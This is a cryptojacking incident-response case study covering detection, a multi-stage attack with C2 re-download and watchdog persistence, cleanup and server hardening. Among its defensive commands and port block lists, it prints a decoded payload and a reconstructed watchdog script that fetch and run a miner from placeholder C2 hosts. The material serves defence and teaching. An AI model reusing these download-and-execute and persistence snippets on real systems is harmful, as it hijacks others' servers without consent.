When Crypto Miners Hijack Your Server
Enterprise Technology · January 31, 2026 · 8 min read

A production server was silently mining cryptocurrency for attackers. Here's how we detected it, cleaned it up, and made sure it never happens again.

Security Audit · Incident Response · Server Hardening

The Silent Thief

Imagine your electricity bill doubles, your servers run hot, and your applications slow to a crawl — but everything looks normal. That's the insidious nature of cryptojacking: attackers hijack your computing resources to mine cryptocurrency, and you pay for it.

This is the story of how we discovered a sophisticated mining operation running on a client's production server, and the lessons we learned along the way.


Something's Not Right

During a routine security check, we ran a basic process analysis:

ps aux --sort=-%cpu | head -10

The output revealed something alarming: a process with a random 8-character name was consuming over 300% CPU — utilizing multiple cores simultaneously. For a server that should be mostly idle between requests, this was a massive red flag.

We dug deeper with netstat and ss to examine network connections:

ss -tupn | grep ESTABLISHED

The process was maintaining active connections to known cryptocurrency mining pools on ports commonly used for the Stratum protocol (3333, 4444, 5555). It was also phoning home to a command-and-control server for configuration updates.
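Spotting these connections is easy to script: filter socket output for the usual Stratum ports. A minimal sketch (the port list mirrors what we saw in this incident; adjust it for your environment):

```shell
#!/usr/bin/env bash
# Ports commonly used by Stratum mining pools
MINING_PORTS='3333|4444|5555|7777|9999|14444'

# flag_stratum: read socket lines on stdin, keep those hitting a mining port
flag_stratum() {
    grep -E ":($MINING_PORTS)[[:space:]]" || true
}

# Feed it live data when ss is available
command -v ss >/dev/null 2>&1 && ss -tupn state established | flag_stratum || true
```

Any non-empty output here deserves immediate investigation.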


What is a C2 Server?

Before diving deeper, let's explain a key concept: Command and Control (C2) servers.

A C2 server is the attacker's remote headquarters. It's a server they control that:

  • Distributes malware — Infected machines download payloads from here
  • Sends instructions — Tells malware what to do, when to update, which pools to mine
  • Receives data — Collects information from compromised systems
  • Maintains control — Even if you kill the malware, it can re-download and restart

Think of it like a puppet master pulling strings. The malware on your server is just a puppet — the real brain is the C2 server giving it orders.


The Attack Flow

Here's how the attack unfolded, including how it survived our first cleanup attempt:

Phase 1: Initial Compromise

Step 1 — Attacker adds SSH key to authorized_keys
(via exposed management interface or compromised credentials)

Step 2 — SSH into server with persistent, password-less access

Phase 2: Infection

Step 3 — Download miner binary from C2 server

curl http://[C2-SERVER]:4082/worker -o /tmp/.w

Step 4 — Create hidden systemd service in ~/.config/systemd/user/
(base64-encoded payload to avoid detection)

Step 5 — Deploy watchdog script that:

  • Monitors miner process every 60 seconds
  • Kills competing miners
  • Restarts miner if killed

Step 6 — Start mining Monero (XMR), connect to pools

Step 7 — Notify attacker via Telegram bot: "New host infected"
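To make the watchdog from Step 5 concrete, here is a reconstruction of its logic as a single iteration. The paths, the competing-miner name, and the C2 URL are sanitized placeholders, not the actual malware:

```shell
#!/usr/bin/env bash
# Reconstruction of one watchdog iteration (all identifiers are placeholders)
MINER=/tmp/.w
CONF=/tmp/.c
C2_URL="http://c2.invalid/worker"   # stands in for the real C2 endpoint

watchdog_tick() {
    # Kill competing miners so the CPU mines only for this attacker
    pkill -f xmrig 2>/dev/null || true
    # If our miner is gone, re-fetch it from the C2 and restart it
    if ! pgrep -f "$MINER" >/dev/null 2>&1; then
        [ -x "$MINER" ] || curl -s "$C2_URL" -o "$MINER" 2>/dev/null || return 1
        chmod +x "$MINER" 2>/dev/null
        "$MINER" -c "$CONF" &
    fi
}

# The deployed script simply looped: while true; do watchdog_tick; sleep 60; done
```

This loop is why killing the process alone accomplishes nothing, as we learned in Phase 3.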

Phase 3: First Cleanup Attempt (Failed)

What we did:

  • Noticed high CPU usage
  • Killed suspicious process with pkill

What happened next:

  • Watchdog detected miner death within 60 seconds
  • Watchdog contacted C2 server
  • Downloaded fresh miner copy
  • Restarted with a new random process name
  • Mining resumed as if nothing happened

Phase 4: Successful Cleanup

Step 1 — Block C2 server at firewall (cut the puppet strings)

Step 2 — Remove unauthorized SSH keys (lock the door)

Step 3 — Kill watchdog + miner processes

Step 4 — Delete systemd persistence service

Step 5 — Rebuild container from clean image (scorched earth)

Step 6 — Block mining ports, enable monitoring, harden SSH
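Because the order of those steps matters, we found it useful to script them as a runbook. This is a sketch only: the C2 address, key comment, and service path are hypothetical placeholders, and with DRY_RUN=1 it just prints what it would do.

```shell
#!/usr/bin/env bash
# Cleanup runbook sketch; all identifiers below are sanitized placeholders
DRY_RUN=1
run() { if [ "$DRY_RUN" = 1 ]; then echo "+ $*"; else "$@"; fi; }

C2_IP=198.51.100.10   # placeholder C2 address

run iptables -A OUTPUT -d "$C2_IP" -j DROP                 # 1. cut the puppet strings
run sed -i '/attacker@evil/d' /root/.ssh/authorized_keys   # 2. lock the door
run pkill -f '/tmp/.w'                                     # 3. watchdog + miner
run rm -f ~/.config/systemd/user/.hidden-service           # 4. persistence
run systemctl --user daemon-reload
```

Review the dry-run output, then flip DRY_RUN to 0 and execute the steps back to back.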

Why the First Cleanup Failed

The key insight: killing the miner process isn't enough.

The attack has multiple layers of persistence:

  1. SSH key — Attacker can log back in anytime
  2. Systemd service — Restarts miner on reboot
  3. Watchdog script — Restarts miner if killed
  4. C2 connection — Downloads fresh malware if files deleted

If you only kill the process, the watchdog brings it back. If you delete the files, the C2 re-downloads them. If you do both, the systemd service restarts everything on reboot. And even if you clear all of that, the SSH key lets the attacker manually reinstall everything.

You have to break all the links simultaneously:

  1. Block C2 (prevent re-download)
  2. Remove SSH keys (prevent re-entry)
  3. Kill all malicious processes
  4. Delete all persistence mechanisms
  5. Rebuild from clean state (eliminate unknowns)

Anatomy of the Attack

The Persistence Mechanism

The attackers had created a systemd user service hidden in a dot-directory:

~/.config/systemd/user/.hidden-service

The service file contained a base64-encoded payload. When decoded, it revealed a script that:

  1. Downloads the mining binary from the C2 server
  2. Fetches configuration (wallet addresses, pool URLs)
  3. Creates a watchdog script to kill competing miners
  4. Sends a Telegram notification upon successful infection

# Decoded payload structure (sanitized)
curl -s http://[C2-SERVER]/worker -o /tmp/.w
curl -s http://[C2-SERVER]/conf -o /tmp/.c
chmod +x /tmp/.w && /tmp/.w -c /tmp/.c &

How They Got In

Examining /root/.ssh/authorized_keys and user home directories revealed an unauthorized SSH key. This gave the attackers persistent, password-less access.

The key likely came from:

  • A compromised developer machine
  • An exposed container management interface
  • A previous undetected breach
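Auditing authorized_keys files is quick to automate. A minimal sketch that prints a fingerprint for every authorized key so unfamiliar ones stand out (the paths are the usual defaults; adjust for your layout):

```shell
#!/usr/bin/env bash
# Print a fingerprint for every authorized SSH key on the host
audit_keys() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        echo "== $f"
        # One fingerprint per key line; unrecognized entries are suspects
        ssh-keygen -lf "$f"
    done
}

audit_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys
```

Run this periodically and diff the output against a known-good snapshot.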


The Cleanup

Phase 1: Document Everything

Before touching anything, we captured the current state:

# Snapshot running processes
ps auxf > /evidence/processes.txt

# Network connections
ss -tupna > /evidence/network.txt

# Cron jobs and systemd services
crontab -l > /evidence/cron.txt
systemctl list-units --type=service > /evidence/services.txt

Phase 2: Rebuild, Don't Patch

Rather than trying to surgically remove the malware, we took the safer approach: complete container rebuild.

# Scale down the infected service
docker service scale srv-infected=0

# Remove all cached layers and artifacts
docker system prune -af

# Rebuild from clean base image
docker service update --force srv-infected

This eliminates any hidden persistence mechanisms we might have missed.

Phase 3: Verify Clean State

After rebuild, we confirmed the infection was gone:

# Check for suspicious processes (random 8-character names)
ps -eo pid,comm | grep -E ' [0-9a-zA-Z]{8}$'

# Verify no mining pool connections
netstat -tupn | grep -E ':(3333|4444|5555|7777|9999)'

# Check container resource usage
docker stats --no-stream

All containers returned to normal CPU usage (under 1%).


Hardening: Defense in Depth

SSH Configuration

We hardened /etc/ssh/sshd_config:

# Disable root login entirely
PermitRootLogin no

# Limit authentication attempts
MaxAuthTries 3

# Reduce login grace period
LoginGraceTime 60

# Disable password auth (key-only)
PasswordAuthentication no

Intrusion Prevention with fail2ban

We configured aggressive banning for SSH brute force attempts:

# /etc/fail2ban/jail.local
# (fail2ban does not reliably parse inline comments, so keep them on their own lines)
[sshd]
enabled = true
maxretry = 3
# ban for 24 hours
bantime = 86400
# within a 10-minute window
findtime = 600

Firewall Rules

We blocked known mining infrastructure at the network level:

# Block C2 server
iptables -A OUTPUT -d [C2-IP] -j DROP

# Block common mining ports (applied to Docker containers too)
for port in 3333 4444 5555 7777 9999 14444 45700; do
    iptables -A DOCKER-USER -p tcp --dport $port -j DROP
done

# Persist rules across reboots
netfilter-persistent save

Monitoring

We set up alerts for anomalous behavior:

# Alert if any container exceeds 200% CPU for 5+ minutes
# (Configured in Netdata/Prometheus/your monitoring tool)
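As a stopgap before full monitoring is wired up, the same check can be scripted against docker stats. A sketch under assumptions (threshold and output format are ours; feed non-empty output into whatever alerting you use):

```shell
#!/usr/bin/env bash
# Print the name of any container whose CPU% exceeds the threshold
THRESHOLD=200

flag_high_cpu() {
    # stdin: "name cpu%" pairs, one per line
    awk -v t="$THRESHOLD" '{ cpu = $2; sub(/%$/, "", cpu); if (cpu + 0 > t) print $1 }'
}

# Live check when docker is available; run from cron, alert on non-empty output
command -v docker >/dev/null 2>&1 &&
    docker stats --no-stream --format '{{.Name}} {{.CPUPerc}}' | flag_high_cpu || true
```

A cron-driven version of this would have caught our miner within minutes instead of at the next audit.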


Indicators of Compromise (IOCs)

For reference, here's what to look for:

Process Indicators:

  • Random alphanumeric process names (8+ characters)
  • Processes consuming >100% CPU consistently
  • Parent processes spawning from /tmp, /dev/shm, or hidden directories

Network Indicators:

  • Outbound connections to ports 3333, 4444, 5555, 7777, 9999, 14444
  • DNS queries to known mining pool domains (kryptex, unmineable, nanopool, etc.)
  • Connections to Eastern European hosting providers (common for C2)

File System Indicators:

  • Hidden files in /tmp, /var/tmp, /dev/shm
  • Unauthorized SSH keys
  • Systemd services in user directories with encoded content
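The file-system indicators above are easy to sweep for. A sketch that lists hidden files in the usual drop directories and flags user-level systemd units (tune the paths and depth for your layout):

```shell
#!/usr/bin/env bash
# sweep_hidden: list hidden regular files in the given directories
sweep_hidden() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 2 -type f -name '.*' 2>/dev/null
    done
}

# Common payload drop locations
sweep_hidden /tmp /var/tmp /dev/shm

# User-level systemd units are rare on servers, so review every hit
find /home /root -path '*/.config/systemd/user/*' -type f 2>/dev/null || true
```

Every hit needs a human decision: either it is known-good and documented, or it goes to incident response.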

Lessons Learned

1. SSH Keys Are Powerful — Treat Them That Way

An SSH key is essentially a permanent password. Rotate them regularly, audit who has access, and remove keys immediately when team members leave.

2. Containers Need Security Too

Running applications in containers provides isolation, but the host system, orchestration platform, and containers themselves all need security attention. Don't assume containerization equals security.

3. Monitor What "Normal" Looks Like

If you don't know your baseline CPU usage, you won't notice when it triples. Establish baselines and alert on deviations.

4. Defense in Depth Works

No single security measure is foolproof. Layering access controls, intrusion prevention, network restrictions, and monitoring creates multiple opportunities to catch attackers.


Quick Security Checklist

Is your server protected?

  • Root SSH login disabled?
  • SSH key-only authentication enabled?
  • fail2ban or similar IPS running?
  • Outbound connections to mining ports blocked?
  • CPU monitoring with alerts configured?
  • Regular security audits scheduled?

If you answered "no" to any of these, you might be an easy target.


This case study is based on a real incident. Specific identifiers have been sanitized to protect client confidentiality.
